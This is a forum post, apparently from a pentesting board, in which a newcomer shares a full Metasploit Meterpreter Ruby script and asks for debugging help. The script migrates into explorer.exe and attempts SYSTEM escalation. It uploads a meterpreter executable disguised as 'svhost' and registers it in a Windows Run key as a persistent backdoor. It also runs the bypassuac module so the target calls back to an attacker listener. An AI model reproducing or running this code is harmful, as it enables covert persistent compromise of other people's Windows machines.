Results 1 to 1 of 1

Thread: Metasploit Script

  1. #1
    Just burned his ISO
    Join Date
    Apr 2012
    Posts
    1

    Default Metasploit Script to get System Priviles XP / 7

    Hello,

    im trying to Automat a script to bypassuac in Windows 7, but my problem is for now that my Script starts but wont continue after the output "Session XX?!?..start")"and i dont know why because i dont know where are the log files, sorry am very new to Metasploit and ruby. Furthermore google give me no results...


    EDIT:

    I will post my full script in hope to get help


    Code:
    @client = client
    
    
    def read_reg(key, value)
    	print_status "Reading Register-Key..."
    	v = registry_getvaldata(key,value)
    	return v
    end
    
    def write_reg(key, value, exec)
    	print_status "Writing Register-Key..."
    	begin
    		registry_setvaldata(key,value,exec,"REG_SZ")
    	rescue::Exception => e
    	print_status("The following Error was encountered: #{e.class} #{e}")
    	end
    end
    
    def upload(file)
    	tmpdrv = @client.fs.file.expand_path("%TEMP%")
    	if not ::File.exists?(file)
    		raise "File to Upload does not exists!"
    	else
    		begin
    			fileontrgt = "#{tmpdrv}\\svhost#{rand(100)}.exe"
    			print_status("\tUploading #{file}....")
    
    			@client.fs.file.upload_file("#{fileontrgt}","#{file}")
    			print_status("\t#{file} uploaded!")
    			print_status("\tUploaded as #{fileontrgt}")
    		rescue ::Exception => e
    			print_status("Error uploading file #{file}: #{e.class} #{e}")
    			raise e
    		end
    	end
    	return fileontrgt
    end
    
    
    def get_system()
    	print_status("Trying to get SYSTEM privilege")
    	results = session.priv.getsystem
    	if results[0]
    		print_status("Got SYSTEM privilege")
    		return 1
    	else
    		print_error("Could not obtain SYSTEM privileges")
    		return 0
    	end
    end
    
    
    def migrate_to_proc(proc)
    	begin
    		# "explorer.exe"
    		process2mig = proc 
    
    		# Actual migration
    		mypid = session.sys.process.getpid
    		session.sys.process.get_processes().each do |x|
    			if (process2mig.index(x['name'].downcase) and x['pid'] != mypid)
    				print_status("#{process2mig} Process found, migrating into #{x['pid']}")
    				session.core.migrate(x['pid'].to_i)
    				print_status("Migration Successful!!")
    			end
    		end
    	rescue
    		print_status("Failed to migrate process!")
    		#next
    	end
    end
    
    
    def check_sys()
    
    	key = ""
    	print_status "OS: #{@client.sys.config.sysinfo["OS"]}"
    
    	if (@client.sys.config.sysinfo["OS"].downcase =~ /xp/)
    		migrate_to_proc("explorer.exe")
    		if (@client.sys.config.getuid !~ /SYSTEM/)
    			print_status "Got only #{@client.sys.config.getuid} Privs..."
    			res =get_system()
    			if (res != 1)
    				key = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'
    			else
    				key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'
    			end
    
    			#if get change key
    			#key = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'
    			value = "nc"
    			found = read_reg(key, value)
    			if (found =~ /svhost/)
    				print_status "Register-Key are already stored"
    			else
    				print_status "Setting up Backdoor..."
    				file = "/root/BACKDOOR/meterpreter.exe"
    				exec = upload(file)
    				write_reg(key, value, exec)
    			end	
    
    		else
    			print_status "[BINGO] Got #{@client.sys.config.getuid} Privs..."
    		end
    	elsif (@client.sys.config.sysinfo["OS"].downcase =~ /windows 7/)
    		print_status "Trying to exploit win 7"
    		migrate_to_proc("explorer.exe")
    		if (@client.sys.config.getuid !~ /SYSTEM/)
    			print_status "Trying to Get System Privs..."
    			post_mod = "windows/escalate/bypassuac"
    			framework = Msf::Simple::Framework.create
    			driver = Msf::ExploitDriver.new(framework)
    			driver.exploit = framework.post.create(post_mod)
    
    			#s = datastore['SESSION']
    			print_status("Session #{session.sid}?!?..start")
    			# Fire it off.
    			@input = Rex::Ui::Text::Input::Stdio.new
    			@output = Rex::Ui::Text::Output::File.new(@default_file)
    
    			session2 = driver.exploit.exploit_simple(
    				'Options' 	=> {"LHOST" => "xxxxxxxxx", "LPORT" => "443", "SESSION" => "#{session.sid}" },
    				'LocalInput' 	=> @input,
    				'LocalOutput' 	=> @output)
    
    			print_status("ok")
    			# If a session came back, try to interact with it.
    			if (session2)
    				print_status("Session #{session2.sid} created, interacting...")
    		
    			else
    				print_line("Exploit completed, no session was created.")
    			end
    
    			
    		end
    			
    	else
    		print_status "Unknow OS System"
    	end
    
    end
    
    
    
    # Main
    print_status("Running Startup script....")
    check_sys() 
    print_status("Done")

    I hope for help and excuse me for my english
    Last edited by DKlay; 04-24-2012 at 01:00 PM.

Similar Threads

  1. [Script] [Video] metasploit-FakeUpdate (v0.1.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 30
    Last Post: 12-06-2010, 04:53 PM
  2. Replies: 10
    Last Post: 07-12-2010, 03:04 PM
  3. how to make autopwn in one script (metasploit)
    By xsoti in forum Beginners Forum
    Replies: 3
    Last Post: 06-07-2010, 06:58 PM
  4. Convert metasploit script to exe
    By yeleek in forum Beginners Forum
    Replies: 3
    Last Post: 05-19-2010, 04:39 PM
  5. metasploit vunerablilty script?
    By luca662 in forum OLD Pentesting
    Replies: 6
    Last Post: 10-05-2008, 01:58 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •